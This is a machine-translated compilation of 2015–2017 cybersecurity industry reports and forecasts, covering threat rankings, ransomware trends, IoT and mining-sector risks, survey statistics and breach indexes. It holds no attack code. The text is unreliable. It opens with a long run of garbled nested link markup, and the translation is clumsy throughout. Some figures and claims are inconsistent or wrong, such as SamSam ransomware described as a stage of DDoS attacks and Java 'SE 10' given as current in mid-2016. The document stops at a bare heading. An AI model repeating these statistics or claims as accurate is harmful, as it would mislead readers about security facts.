[[Internet of Things of Internet of Things (IoT)|[[Internet of Things of Internet of Things (IoT)|[[Internet of Things of Internet of Things (IoT)|[[Internet of Things of Internet of Things (IoT)|[[Internet of Things of Internet of Things (IoT)|[[Internet of Things of Internet of Things (IoT)|[[Internet of Things of Internet of Things (IoT)|[[Internet of Things of Internet of Things (IoT)|[[Internet of Things of Internet of Things (IoT)|[[Internet of Things of Internet of Things (IoT)|[[Internet of Things of Internet of Things (IoT)|[[Internet of Things of Internet of Things (IoT)|[[Internet of Things of Internet of Things (IoT)|[[Internet of Things of Internet of Things (IoT)|[[Internet of Things of Internet of Things (IoT)|[[Internet of Things of Internet of Things (IoT)|[[Internet of Things of Internet of Things (IoT)|[[Internet of Things of Internet of Things (IoT)|[[Internet of Things of Internet of Things (IoT)|[[Internet of Things of Internet of Things (IoT)|[[Internet of Things of Internet of Things (IoT)|[[Internet of Things of Internet of Things (IoT)|[[Internet of Things of Internet of Things (IoT)|[[Internet of Things of Internet of Things (IoT)|[[Internet of Things of Internet of Things (IoT)|[[Internet of Things of Internet of Things (IoT)|[[Internet of Things of Internet of Things (IoT)|[[Internet of Things of Internet of Things (IoT)|[[Internet of Things of Internet of Things (IoT)|[[Internet of Things of Internet of Things (IoT)|[[Internet of Things of Internet of Things (IoT)|[[Internet of Things of Internet of Things (IoT)|[[Internet of Things of Internet of Things (IoT)|[[Internet of Things of Internet of Things (IoT)|[[Internet of Things of Internet of Things (IoT)|Internet of Things (IoT)]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]

The company sees Internet of Things (IoT) the next nightmare for Information Security Services. Technology revolution led to a full integration in network of small devices which can turn into the points allowing hackers to get into corporate networks.

DDoS attacks

The largest DDoS attacks are carried out 2016 in recent months, the company reported. These attacks are executed a bot networks of thousands of infected IoT-devices (IP cameras, routers and so forth). In 2017 the number of the similar attacks will increase.

Mobile phones

It will be simpler to cybercriminals to be focused on one operating system for receiving the maximum profits. Users of Android are expected by difficult and dangerous 12 months.

Cyber wars

The unstable situation in the field of the international relations can lead to serious and serious consequences in the field of cyber security. The governments of the different countries aim to get access to large volumes of information (when enciphering becomes more and more popular), and intelligence agencies will be even more interested in obtaining information which can bring benefit to the industry of the countries. Such global trend can interfere with initiatives of data exchange in 2018.

PandaLabs: Cyber security. Forecasts for 2017

Research of IBM and Ponemon Institute: the companies are still not ready to resist to cyber attacks

The company IBM also Ponemon Institute published in November results of a global research of resistance of the organizations to cyber attacks under the name "Cyber Resilient Organization". According to results of a research, only 32% of specialists in the field of IT and security consider that their companies have the high level of cyber defense. In 2015 this indicator was 35%. In addition, 66% of the respondents participating in a research in 2016 note that their organizations are not ready to recovery after cyber attacks[28]

The problems connected with response to incidents (Incident Response) as the second year in a row shows a research are the main obstacle in stabilization of the organizations to threats of cyber security. 75% of respondents said that in their companies there is no plan for response to cyberincidents (Cyber Security Incident Response Plan). In those organizations where such plan is, 52% of respondents did not review or updated the document from the moment of its acceptance, or, moreover, such procedure is not provided in the companies. At the same time, 41% of participants of a research noted that for the last 12 months time which is required for permission of a cyberincident increased. 31% of respondents answered that this indicator decreased.

"The research of resistance of the enterprises to threats of cyber security shows that in 2016 the organizations around the world are still not ready to reaction and neutralization of incidents, – John Bruce, the head and the cofounder of Resilient, IBM company said. – Leaders of security can achieve considerable improvements, having made the main priority response to incidents and having concentrated attention on planning, preparation and collection of information".

According to respondents, the platform of response to incidents (Incident Response Platform) is one of the most effective security technologies which helps the organizations to resist to cyber attacks, along with management of identification and authentication, detection systems and prevention of cracking.

During the research the typical problems interfering increase in level of cyber security of the organizations were also revealed. Most of survey participants (66%) consider that insufficient planning and low readiness are the main barriers to increase in resistance of the enterprises to cyberthreats. Respondents also specify that the complexity of IT and business processes grows quicker, than capability to prevent, detect and react to cyber attacks that does the companies vulnerable. This year 46% of participants of a research specified the increased complexity of IT processes as the main noise for building of reliable information protection of business – the indicator grew from 36% according to the results of a research of 2015. 52% of respondents said that the complexity of business processes is an essential barrier, in comparison with 47% in 2015.

Key outputs of a research:

The companies are exposed to frequent and successful cyber attacks

  • More than a half of respondents (53%) suffered at least from one date leak in the last two years
  • 74% of respondents said that within the last year they faced cyberthreats which reason was a human factor
  • Estimating the last two years, 74% of respondents told that they were exposed to the numerous hacker attacks, and 64% were repeatedly compromised using a phishing

The organizations cannot ensure continuous functioning and quickly be recovered after the attacks

  • 68% consider that their organizations are not capable to resist to cyber attacks
  • 66% are not sure that their company can effectively be recovered after the attack

The biggest barrier is the lack of planning and preparation

  • Only 25% use the plan for response to incidents. 23% did not adopt such plan at all
  • Only 14% of respondents perform audit of plans of response to incidents more often than once a year
  • 66% call lack of planning the biggest barrier preventing their organization to become steady against cyber attacks

Capability to react to cyber attacks significantly did not improve

  • 48% consider that resistance to cyber attacks of their organization decreased (4%) or did not improve (44%) within the last 12 months
  • 41% of respondents consider that time of elimination of an incident of cyber security increased or considerably increased, at the same time 31% said that it decreased or significantly decreased

Check Point noted growth of number of cyber attacks and malware by 5%

The team of researchers of Check Point detected, as the number of harmful families, and the number of the attacks grew by 5%. The volume of the attacks on business in October reached the pica, in comparison with all last months 2016. The number of the attacks with the racketeer of Locky therefore in October it moves from the third to the second place among the most often used types of the malware continues to grow. The reason of popularity of Locky — permanent emergence of its modifications and the mechanism of distribution mainly through spam mailing. Founders of Locky change type of the files used for loading of the racketeer (doc, xls and wsf files) and also make significant structural changes to spam letter. The racketeer in itself is not something exclusive, but cybercriminals spend a lot of time to infect as much as possible computers. In top-3 the bank trojan of Zeus also returns.

1. ↔ Conficker — Was used in 17% of the registered attacks. The worm providing remote execution of transactions and loading of the malware. The infected computer is controlled a bot which addresses for obtaining instructions the command server.

2. ↑ Locky — Racketeering software, appeared in February, 2016. Extends generally through spam letter, containing the file infected with Word or Zip which loads and sets the malware ciphering the user files. It is registered in October in 5% of the known attacks.

3. ↑ Zeus — is Also mentioned in 5% of the detected attacks. Troyan who attacks Windows platforms and is often used for theft of bank information by means of capture of the entered credentials (formgrabber) and a keylogging

The number of the attacks on Russia in October considerably decreased that allowed it to fall from 52 by 101 places. Attacks to the companies in the territory of the country were carried out using such malware as InstalleRex, Conficker, Kometaur, Ramnit, Cryptoload, Dorkbot, Cryptowall, Locky, Bancos and Sality. Most last month attacked Botswana, Uganda and Zambia, and the attacks most less registered was to Uruguay, Argentina and Dominican Republic.

Mobile malwares continue to subject business of considerable danger: 15 of 200 types of the malware attack mobile devices. Also within the last seven months of HummingBad, the malware for Android, remains the most used for attacks on mobile devices. Three most often used types of mobile threats in October:

1. ↔ HummingBad is the Malware for Android which, using a rootkit, steady against reset, installs fraudulent applications and with small modifications can show additional harmful activities, including installation of the program keyloggers, theft of the credentials and a bypass ciphered by email containers, used by the companies.

2. ↔ Triada is the Modular backdoor for Android which gives the increased privileges to the loaded malwares as helps them to be implemented into system processes. Triada was also noticed in substitution of the URL addresses loaded in the browser.

3. ↑ XcodeGhost — Komprometirovannaya the version of the platform of IOS Xcode developers. This unofficial version of Xcode is changed so that it can implement a malicious code in the application which is developed and compiled with its help. The implemented code sends information on the application to the command server, allowing the infected application to read out data from a device clipboard.

"The fact that top-10 malware remains without changes since September allows us to assume that cybercriminals are happy with their action. And for the companies it is a signal that they need to react proactively to protect the critical business assets. The efficiency of such programs as Conficker, says also that so far the companies do not use protection of necessary level — Vasily Dyagilev, the chief representative of Check Point Software Technologies comments. — To protect itself, complex approach and measures of advanced protection of networks, end and mobile devices is necessary for business to stop the malware to infection. It is possible with such solutions as Check Point’s SandBlast™ Zero-Day Protection and Mobile Threat Prevention which are capable to resist to the latest threats".

Fortinet about trends in the field of cyber security

Fortinet published six forecasts which are carried out by specialists of department of a research of threats FortiGuard Labs and concerning development of threats in 2017. In these forecasts it is told about strategy and methods which, according to researchers of Fortinet, cybercriminals will use in the near future. The scale of potential negative effects of cyber attacks for world virtual economy is also characterized.

1. From smart to even more smart: the automated and humanoid attacks will demand development of more intelligent systems of security

Threats become more and more sophisticated and autonomous. Next year emergence of the malware with humanoid behavior, capable to adaptation and training at a basis of successful actions is expected. It will make the attacks more effective and harmful.

2. Producers of IoT devices will bear responsibility for security violations

If producers of IoT devices do not manage to ensure safety of the products and to hold buyers whose interest will decrease owing to the concerns connected with risks in the field of information security it will lead to significant changes in the world virtual market. Interest of consumers, suppliers and other groups in development and implementation of standards of security using which producers of devices can be called for damage liability, caused by behavior of their products will significantly increase.

3. 20 billion IoT devices — a weak link of cloud infrastructure

The weakest link of a security system of a cloud is not its architecture. The main source of threat are millions of remote devices which get access to cloud resources. Emergence of the means developed especially for defeat of end devices is expected. It will lead to the attacks on client side which will be able easily to punch gaps in security systems of suppliers of cloud services. The number of the organizations implementing the strategy of protection and segmentation on the basis of security systems will increase. Such systems allow to create, configure and apply uniform security policies to physical, virtual and private cloud environments — from IoT to a cloud.

4. Owing to the attacks the situation in "smart cities" will begin to be heated

Next year quickly developing automation systems of buildings and management will become the purposes of malefactors. If any of these integrated systems which are of special interest for cybercriminals gets under blow, it can lead to severe violations in the field of service of citizens.

5. Programs racketeers are only the beginning

It is expected that cybercriminals will carry out the directed attacks which purposes will be celebrities, political figures and the large organizations. The automated attacks using programs racketeers will allow malefactors to use scale effect and to be enriched due to simultaneous deception of a set of the victims, each of which provides the small amount. Most often IoT devices will be exposed to the attacks.

6. There will be a need for compensation of critical shortage of qualified personnel in the field of security due to implementation of new technologies

In view of the shortage of specialists in information security which is observed now many organizations and the countries wishing to enter the world virtual market will undergo considerable danger. The personnel of these organizations do not locate the experience and preparation necessary for the solution of such tasks as development of security policy, protection of important resources which freely move between network environments, or identification of the modern advanced attacks and taking measures of reaction.

The predicted trends of development of threats and outputs

Internet of Things (IoT) and cloud technology still often appear in forecasts, however some trends came to light eventually. Degree of Internet activity both the organizations, and individuals considerably increased that promotes growth of number of the potential directions of the attacks. Besides, can act as the purpose anything, and in the same way any means can become weapon. Threats become more and more sophisticated, they can independently function, and it is harder and harder to reveal them. And last trend: the old threats improved using new technologies that opens the new horizons in the field of identification and the analysis of threats return.

3.2 million PCs are vulnerable, 0.002 million have means of protecting

In October, 2016 the engineering department of Talos (the division of Cisco which is engaged in a research and the analysis of threats for information security) reminded of the traditions of cybercriminals adapted for a digital era.

Cyber crime became a large-scale problem of mankind, she mentions users, the companies, the states. Actions of hackers are capable to result in material damage and to paralyze work of corporations, banks, public services and systems.

Martin Lee, the head of engineering department of Talos
Models on which malefactors conduct the activity are not new. They use traditional schemes, adapting them to realities of a digital era.

The classical model of criminal activity – stealing with the requirement of the redemption, was widely adopted at cyberswindlers. If before gangsters the territory at which they worked limited, then cybercriminals know no limit. The first case of stealing with the requirement of the redemption in digital space is recorded in 1989 in Thailand. The swindler sent in medical institutions e-mails with the requirement to transfer money for the stolen data to the address in Panama. The similar type of racketing worked 16 years.

In 2005 GP coders appeared. By means of these devices criminals cipher files on the infected device and demand money from the user for interpretation. Creation of software tools for enciphering ‒ very difficult process therefore malefactors often use forgeries. Having given money, the user can not receive back stolen documents as they are already deleted, with high probability. Criminals use this type of racketing still, only improve cryptography techniques.

The next stage of evolution of DDoS attacks began in March, 2016 when we faced activity of gang of SamSam. This group gets into the server system of the organization, reaches the key data necessary for daily operating activities, ciphers them and demands the redemption. The cracked company has a big temptation to pay criminals as these files are important for daily work.


Cyber crime became business. Malefactors conduct the activity as business companies. They aim to lower costs and to maximize profit, enter other markets. Criminals carefully count the benefit. The size of the redemption should be slightly lower, than the value of the stolen documents at the company, it should cover expenses on conducting criminal activity. In the work malefactors use the same hi-tech tools, as business companies. Large players in this black market are serviced by service organizations, the ecosystem of certain specialists and criminal groups who perform DDoS attacks is created.

It is necessary to remember that if you have something, being of value, then surely there will be a swindler who will try to steal it. According to us, in the world 3.2 million computers and systems are vulnerable to the hacker attacks, and only for 2100 from them necessary means of protecting are set.

Martin Lee

Europol called eight top trends of cybercrimes

  • Crime - in - qualities-services: "underground digital services" are supported with the crime-in-qualities-services model which becomes more and more popular and demanded. It integrates among themselves specialized suppliers of hacker utilities and organized criminal groups. Terrorists have the obvious potential for gaining access to this sector in the near future.
  • Programs racketeers: racketing and bank "trojans" remain the main threats among the malicious software. And this trend will hardly change in the near future.
  • Criminal use of data: data remain key goods for cybercriminals. In many cases they are used for receiving an immediate pecuniary benefit, but even more often applied to sale of more complex circuits of fraud, ciphered for the purpose of obtaining the redemption, or is used directly for racketing.
  • Payment fraud: EMV (the chip and the PIN code), geo-blocking and other industrial security measures continue to help with effective fight against card fraud, but, nevertheless, also the number of the attacks directed against ATMs grows. Organized criminal groups begin to compromise the payments connected with use of proximity cards (NFC).
  • Online sexual violence over children: use of platforms with end-to-end enciphering for exchange of media of files and also application of anonymous payment systems promotes escalation of online broadcast of child abuse.
  • Abuse of "dark side of network": "a dark part of the world Internet web" continues to promote the criminals participating in a number of illegal types of activity, such as, file sharing with record of sexual violence over children. Degree in which extremist groups use cybertechnologies for implementation of the attacks are limited now, but the offer in "dark network" of hacker utilities and services and also illegal goods, can quickly change current situation.
  • Social engineering: law enforcement agencies registered growth of number of the phishing attacks directed to the purposes having the high importance. The attacks against the CEOs of the enterprises and the organizations became the main threat.
  • Virtual currencies: Bitcoin remains that currency which swindlers prefer for payment for acquisition of illegal goods and services in "dark network. Bitcoin also became the standard payment solution of a pritrebovaniya of the redemption and other forms of racketing.

Growth of volume, scale and cost of cybercrimes is still observed. Lately these indicators reached unknown level. Some states entering the EU say that cases of crimes in the field of cyber security, perhaps, already exceed the number of traditional crimes[29].

Growth of number of swindlers together with increase in quantity of opportunities for participation in highly profitable illegal activity partially feeds a similar trend, as well as emergence of new tools for commission of cybercrimes in such spheres as the mobile malware and fraud directed against ATMs. Nevertheless, the body of a problem consists in insufficient observance of standards of a digital security by legal entities and physical persons.

Considerable part of cybercriminal activity still uses rather old technologies to which security are available, but does not use wide circulation.

9-fold growth of unknown malwares in a decade

On September 22, 2016 Check Point Software Technologies Ltd. published results of a research in which noted the 9-fold growth of the unknown malwares attacking the systems of the enterprises and drew a conclusion on need of implementation for the companies of the protective architecture, best in the class.

Experts of the company carried out the analysis of the data received from 31 thousand gateways of security of Check Point worldwide and described - what known and unknown types of the malware and the attacks influence IT systems of the companies, what effects of integration of mobile devices into IT infrastructures of the enterprises. The loss estimate of the companies from cracking and expenses on elimination of their effects is also given.

Picture of average day at the enterprise according to the report of Check Point 2016 Security Report, (2016)

Within the research SANS 2016 Threat Landscape Study conducted together with researchers of institute of SANS, specialists polled more than 300 professionals in the field of IT and security worldwide.

Poll purpose - to find out:

  • what threats of the organization face in reality,
  • when and as these threats become security incidents,
  • what types of threats have the most serious effects,
  • what critical tasks face the companies wishing to protect themselves.

Both reports, Check Point Security Report and SANS 2016 Threat Landscape Study, give an idea of a landscape of the happening cyberthreats — from network to the end device.

Main outputs of a research:

  • The number of types of the unknown malware continues to grow. Researchers detected 9-fold increase in number of the unknown programs attacking the organizations. The reason of growth of quantity of cases of penetration into network - the employees loading unknown malwares each 4 seconds. Every month specialists detect nearly 12 million unknown versions of malware. In the last two years it is more such "finds", than for all last decade.
  • Security is not in time behind quickly developing mobile devices. 60% of all time spent on digital media are the share of smartphones and tablets. For business mobile devices — horror in terms of security of access and good luck in terms of increase in productivity. In spite of the fact that employees do not want to harm intentionally security of the company, because of every fifth of them there is cracking — via the mobile malware or the infected Wi-Fi point.
  • End devices — a starting point of the majority of the attacks. In the studied companies the user devices are the most frequent reason of cracking and the most important component of cyber defense, and in 75% of cases for commission of the attacks hackers use e-mail. 39% of the attacks on end devices bypass protection of firewalls, and regular checks find out 85% of threats how they snared the companies.

Both reports warn: effective security begins with implementation of the protective architecture, best in the class, which will help to solve present and future problems of protection of IT infrastructure. Advanced prevention of threats, protection of mobile devices and segmentation of network — the critical components necessary for information security of the modern company.

Cybercriminals aimed at mining industry

On August 11, 2016 Trend Micro Incorporated published the report of "Kiberugroza in the mining industry" (Cyber Threats to the Mining Industry) in which the conclusion is drawn on the growing level of interest of cybercriminals in mining industry.

Banks, financial, medical institutions were earlier main objectives of cybercriminals, now they paid attention and to the enterprises of mining industry. The problem of cyber attacks in this industry is closely connected with the growing extent of automation of its processes. To replace manual work and simple mechanisms the devices controlled on a centralized basis by means of the special software came.

At the similar enterprises operational technologies (Operational Technology, OT) – hardware and the software fixing changes in production process and managing them are used. At the same time in many organizations OT at best are poorly protected from possible cyber attacks. And the increasing penetration into the industry of cloud computing, the systems of a business intelligence and Internet of Things leads to merging of IT and OT that gives to malefactors broad access to components of systems and crucial processes.

The majority of the industrial management systems (Industrial Control Systems, ICS) used in 2016 are developed a decade ago. In connection with the new requirements of connection to corporate network and use of remote access, ICS developers, as a rule, adapt the corresponding IT solutions for simplification of integration and cutting of costs for development. However it leads to emergence of a number of new vulnerabilities.

Examples of large cyber attacks in mining industry:

In April and May, 2015 Canadian gold mining company Detour Gold Corp. underwent the attack of hacker grouping which called itself Angels_Of_Truth. As a result malefactors stole more than 100 GB of valuable information. At the same time 18 GB from these data were placed at a torrent tracker.

In February, 2016 the Department of the industry, resources and power industry of New South Wales also underwent the attack of hackers. Malefactors unsuccessfully tried to get access to the confidential information concerning permission to mineral extraction.

In April, 2016 in the Canadian gold mining company Goldcorp there was a large date leak. Malefactors published 14.8 GB of data, having placed the relevant document on Pastebin, the popular website for storage and the general use of data, with the link to its downloading. The archive contained personal data of workers and financial information.

Cyber attacks in the industry are made, generally for obtaining a certain technical knowledge in achievement of competitive advantage, weakening of economy of other state, obtaining certain data (personal information (PII), a financial component or accounts) or even for the purpose of a protest against the companies in the extracting industry as source of environmental pollution.

Cyber attacks are really capable to have a great influence on business of the company, for example, to lead to deterioration in financial performance, theft of intellectual property, loss of competitive advantage, etc. All this becomes possible because of capability of cybercriminals to get access to necessary information. In mining industry are interesting to malefactors, first of all:

  • data on pricing on metals and minerals;
  • intellectual property, for example, method of production, processing of raw materials, chemical formulas, software, etc.;
  • information on state policy, solutions and decision making processes by heads of corporations;
  • data on new potential fields;
  • inventory information of ore and production process;
  • data of monitoring systems of mines which are used for production control, security and condition monitoring of the environment in real time.

Cyber attacks in mining industry not only can be the cause of losses because of idle times on production, but have a negative impact on the share value of the company, cause damage to national economy or the region if it depends on the similar enterprise.

The most often used methods of commission of cyber attacks on today's are:

  • phishing and social engineering;
  • operation of vulnerabilities;
  • infection of the site which the staff of the enterprise visits most often;
  • wrong system configuration of operation;
  • hidden loading;
  • harmful advertizing;
  • compromise of third-party vendors;
  • man-in-the-middle attack (MitM);
  • equipment infection;
  • insiders.

In the report the company draws a conclusion - most the enterprises of mining industry do not realize importance of protection against cyber attacks. And vulnerabilities which malefactors can use are detected constantly.

Cyber security specialists should pay special attention to large mining companies whose activity is directly connected with state of the economy of certain regions or countries. They first of all need to implement advanced methods of protection at all levels of enterprise management.

Cisco: programs racketeers come

On July 28, 2016 Cisco published the report on information security for the first half of the year 2016 in which pointed out a high probability of emergence of the next new generation of programs racketeers. In the light of this statement, the main solution of a task for the organizations in data protection, the company sees need to close "window of opportunities" before malefactors.

According to the report of Midyear Cybersecurity Report of Cisco company, organization are not ready to emergence of types of sophisticated programs racketeers and among the basic reasons promoting reserved activity of malefactors:

  • unstable infrastructure,
  • bad network hygiene,
  • low speed of detection.

Cisco 2016 Midyear Cybersecurity Report: Executive Perspectives, (2016)

Results of a research allow to draw a conclusion: the main difficulties of the company are experienced in attempts to limit operational space attacking that threatens all basic structure necessary for digital transformation. Malefactors broadened spheres of activity attacking servers, the refinement of the attacks increased, cases of use of enciphering for masking of malicious activity became frequent.

According to the results of the first half of the year 2016 of the program racketeers became the most profitable type of malicious software in the history, experts of Cisco said. They consider, this trend will remain, programs racketeers will have even more destructive functionality, having received capabilities to extend independently. In this case networks and the companies can become "hostages".

Cumulative Annual Alert Totals, (2016)

Modular types of such programs will quickly change tactics for achievement of maximum efficiency. For example, future programs racketeers will be able to avoid detection thanks to capability to minimize use of the central processor and to lack of managing commands. Such versions of programs racketeers will quicker extend the predecessors and prior to the attack to samoreplitsirovatsya in the organizations.

One of the main problems of the companies and networks, was and remains - a bad obozrevayemost of network and endpoints. On average on identification of new threats at the organizations leaves up to 200 days. Reduction of time of detection of threats is extremely important in terms of restriction of operational space of malefactors and minimization of damage from invasions.

Additional conveniences attacking create the unsupported and unrenewable systems which allow them to get access, to remain unnoticed, to increase the income and to cause the maximum damage. The report of Cisco MCR 2016 demonstrates that the problem belongs to universal. Within several months growth of the attacks is mentioned in the most important industries (for example, in health care), at the same time all vertical markets and world regions become the purpose of malefactors. Public organizations and the enterprises, charitable and non-governmental organizations, the companies of e-commerce — all of them in the first half of 2016 fixed growth of number of the attacks.

Malefactors of do not limit

The sizes arrived attacking are directly proportional to a time frame of reserved actions. According to Cisco, the income of malefactors increased in the first half of 2016 owing to a number of factors:

  • Expansion of the sphere of actions. Attacking broaden the sphere of the actions, passing from client exploits to server, avoiding detection, maximizing damage to the enterprises and the income.
    • vulnerabilities of Adobe Flash remain one of main goals of harmful advertizing and sets of exploits. In the widespread Nuclear set 80% of successful attempts of cracking fall to the share of Flash.
    • Cisco noted also a trend of the programs racketeers operating server vulnerabilities, in particular it concerns the Jboss servers (10% of all servers connected to the Internet are compromised). Much of vulnerabilities of Jboss, used for a compromise of systems, are revealed five years ago and basic adjustments, updates of vendors could prevent the similar attacks.

  • New methods of the attacks. In the first half of 2016 cyber crime developed the methods using a lack of an obozrevayemost of network.

    • exploits of binary files Windows for last half a year came out on top among the web attacks. This method provides strong provision in network infrastructures and complicates detection and elimination of the attacks.
    • fraudulent social engineering to Facebook moved from the first place (2015) to the second.

  • Covering tracks. In addition to obozrevayemost problems malefactors began a thicket to use enciphering as a masking technique of different aspects of the activity.

Actions of protection in attempts to reduce vulnerabilities and to close gaps

At collision with the sophisticated attacks it is difficult for the companies having limited resources and the growing old infrastructure to keep up with the opponents. Data retrieveds allow to assume - the technology is more important for business operations, the situation with adequacy of network hygiene, including, with correction of software is worse. For example:

  • in relation to browsers, the last or penultimate version of Google Chrome supporting automatic updates is used by 75 — 80% of users;
  • Java is updated much more slowly: on one third of the studied systems it is installed by software of Java SE 6 which the Oracle company took out of service long ago (the version existing for July 28, 2016 — SE 10);
  • no more than 10% of users of Microsoft Office 2013 v.15x set the latest version of a packet of corrections.

The research Cisco revealed also - the most part of infrastructure of the potential victims is not supported or operated with the known vulnerabilities. It is a system problem, both for vendors, and for endpoints. Cisco, inspecting> 103  thousand devices connected to the Internet detected:

  • at each device there were on average 28 known vulnerabilities;
  • average term of activity of the known vulnerabilities on devices ~ 5.64 years;
  • more than 9% of the known vulnerabilities are more senior than 10 years.

For comparison specialists of Cisco inspected more than 3 million program infrastructures, generally on the Apache and OpenSSH platform. In them 16 known vulnerabilities with an average term of existence are revealed 5.05 years on average.

It is simple to update the browser on the user's device, it is more difficult — corporate applications and server frameworks as it can entail interruptions in business processes. The conclusion drawn in a research: the application role in business operations of the company is more important, the probability of its regular, frequent updating is less that involves emergence of gaps in protection and opportunities for the subsequent attacks.

Prices of cracking of accounts of social networks and mail services

Cracking of the server, theft of funds from bank cards, personal data leakage – on these and many other "services" appeared a price. The Dell SecureWorks company which specializes in assessment and the analysis of information security of computer systems published in the summer of 2016 "price list" of service prices of hackers worldwide. According to market participants, it is one of cyber crime prosperity signals.

According to specialists, access to the American account in social networks costs about $129, and in Russian Odnoklassniki and VKontakte - $194. Cracking of the Gmail account, Hotmail or Yahoo will manage on average $129. And for only 40-60 thousand rubles it is possible "to order" any information on the domestic competitor: data on bank accounts, TIN, constituent documents, information about employees and phone numbers.

News about theft of personal data or illegal money withdrawal from the bank card appear in the press with enviable regularity. So, for example, in May personal data of 117 million users of social network LinkedIn were offered for sale on "the shadow Internet". According to the estimates of analysts, the hacker under the alias "World" could earn from it about $2.5 thousand. And the other day the woman from the Nizhny Novgorod Region transferred to the malefactor 85 thousand rubles, thinking that she talks to the employee of the bank.

Balabit: TOP-10 the most popular hacker methods

1. Social engineering (for example, phishing)

Most of hackers aim to become insiders and to increase the privileges of the stolen account. Attempts to find the existing exclusive account and to crack its password — process not the fastest, and it leaves many marks (for example, the additional logs generated as a result of attempts of the automated attacks) which considerably increase risk of detection of suspicious activity. For this reason hackers prefer to use acceptances of social engineering, inducing users to share the login and the password voluntarily.

"The last data theft more than 10,000 employees of the Ministries of Justice and national security and cracking more than 20,000 accounts of staff of the Federal Bureau of Investigation (FBI) once again prove that today it is much simpler to hackers to become "" in a system using tactics of social engineering, than to write exploits of zero day" — Zoltan Djyorku, the CEO of Balabit company says. Traditional instruments of access control and anti-virus solutions, certainly, are necessary, but they protect the major company assets, only when hackers are outside network. They should get once into a system, even through low-level access, they can easily increase powers and get already exclusive administrative access to corporate network. The bigger risk is a finding of the hacker in network when he becomes one of privileged users.

The cracked accounts (when legal logins and passwords are used in criminal objectives) can be detected, having noticed changes in behavior of users, for example, in time and places of login, a print speed on the keyboard, the used commands, suspicion for use accounting records in scripts. Tools of the analysis of the user behavior which create basic profiles of actions of real employees can easily detect anomalies in use of accounts and warn about it security experts or block the user before clarification of all circumstances" — Zoltan Djyorku adds.

2. The compromised accounts (for example, weak passwords)

Cracking of accounts, especially slabozashchishchenny, constitute danger because users usually prefer to use the simple easily memorable passwords and often same for corporate and personal accounts. If the hacker gets access to the login and a user password in less secure system (for example, from the personal account in social network), he will be able to use them for an input in network of the company.

3. Web attacks (for example, SQL code injections)

Use of holes of security of online applications (for example, implementation of the SQL code) still is very popular method of cracking, mainly, because applications are the most important interface of access to company assets for a large number of internal and external users that does them by the attractive purpose for the attacks. Unfortunately, the quality of the code of applications still raises questions in terms of security. There is a set of automatic scanners which malefactors can use for detection of vulnerable applications. Other methods of cracking can result hackers in the same results, but be more difficult in application or more long. For example, writing of an exploit takes more time and requires good skills of programming.

Places among other most popular hacker methods were distributed as follows: 4. Attacks on a client part (i.e. on browsers of documents, browsers)
5. Use of exploits for popular server updates (for example, OpenSSL, Heartbleed)
6. Uncontrollable personal devices (for example, at absence the politician of BYOD in corporate environment)
7. Physical invasion
8. Shadow IT (for example, application by the user of personal cloud services in the working purposes)
9. Use of service providers of the third parties (for example, outsourcing of infrastructure)
10. Data theft, loaded into a cloud (for example, IaaS, PaaS)


Gemalto: Breach Level Index 2015 Index of criticality of data loss

The Gemalto company published analysis results of the index of criticality of date leaks [30] in February, 2016 [31] according to which in 2015 in the world 1673 incidents which led 707 million data writings to a compromise were recorded.

Breach Level Index 2015

According to results of the index of criticality of date leaks, since 2013 - when the company began to make the comparative database of publicly lit leaks - in the world more than 3.6 billion data writings were compromised in total. On a source of leaks in 2015 the greatest number of incidents was the share of the attacks of third-party malefactors – all 964 such incidents, or 58% of the total number of incidents and 38% of the number of the compromised data writings were recorded. As the compromised data the leaks directed to plunder of accounts – 53% of the total number of incidents and 40% of the number of all compromised data writings remained the most widespread leaks still.

By the industries 43% of all compromised data writings that is 476% higher in comparison with 2014 (it is caused by several extremely large date leaks which happened in the USA and in Turkey), and only 16% of the total number of leaks fell to the share of leaks in public sector. 19% of total number of the compromised records and 23% of all date leaks were the share of the health sector. The number of the compromised data writings in the sector of retail sharply was reduced in comparison with the same period of previous year (by 93%): in 2015 only 6% of all kidnapped persons of data writings and 10% of all recorded leaks fell to their share. In the sector of financial services the quantity of the compromised accounts was reduced almost by 99%, only 0.1% of all compromised data writings, or 15% of the total number of leaks fell to their share.

Though most of all date leaks were connected with activity of third-party malefactors (58%), fall to the share of accidental leaks the whole 36% of all compromised data writings. The number of the attacks performed by request of the governments of the different countries made only 2% of all date leaks, however the number of the stolen data writings as a result of the similar attacks was 15% of all number of the compromised records. 14% of all date leaks and only 7% of the compromised data writings fell to the share of the attacks made by malefactors from within network.

In terms of geography of 77% of all date leaks occurred in North America, at the same time 59% from all compromised records were the share of the USA. The number of the leaks made in Europe was 12% of the total number of incidents, and only 8% of all number of leaks fell to the share of the Pacific Rim.

Results of the complete analysis of date leaks, including with breakdown by the industries, sources, type and geography are available in the report of 2015 Breach Level Index Report.

Gemalto: only enciphering will help to be protected from data loss

In comparison with the first half of 2014 the number of date leaks increased by 10%, at the same time the number of the compromised data writings for the first six months of this year was reduced by 41%. Decrease in number of the compromised data is explained by the fact that this year the number of the recorded large-scale leaks in the industry of retail appeared less, than for the same period of last year.

Despite decrease in a total quantity of the compromised records, as a result of large leaks large volumes of personal information and credentials are still abducted. The attack for the purpose of identity theft of clients of Anthem Insurance became the largest date leak in the first half of 2015. As a result of this attack which got 10 points on danger degree by the Index of criticality of date leaks 78.8 million accounts were compromised that made nearly one third (32%) of the total number of the data writings stolen for the first half of the year 2015. Among other large incidents which took place in reporting period there was a leakage of 21 million accounts from Personnel management of the USA (U.S. Office of Personnel Management) with degree of danger of BLI: 9.7; leakage of 50 million accounts in General directorate for the population and citizenship of Turkey (Turkey’s General Directorate of Population and Citizenship Affairs) with degree of danger of BLI: 9.3; and leakage of 20 million accounts in the Russian service Topface with degree of danger of BLI: 9.2. Actually, 81.4% of all compromised data writings fall to the share of 10 largest date leaks.

Date leaks on a source

Only 2% of all incidents are the share of a share of the leaks organized by government institutions, however the number of the compromised data as a result of the similar attacks is in total 41% of the total number of kidnapped persons of data that is caused by scales of incidents with Anthem Insurance and with Personnel management in the USA. Though any of ten largest incidents in the first half of 2014 was not the attack of state structures, this year three of ten largest leaks, including two largest, were financed by the state.

At the same time, actions of external malefactors in the company (malicious outsiders) became the most widespread source of leaks in the first half of 2015 – 546 leaks or 62% of all leaks, in comparison with 465 leaks (58%) in the first half of last year fell to the share of similar incidents. As a result of actions of external malefactors 56% or 116 million data writings whereas in 2014 results were higher - 71.8% or 298 million data writings were compromised.

Date leaks on type

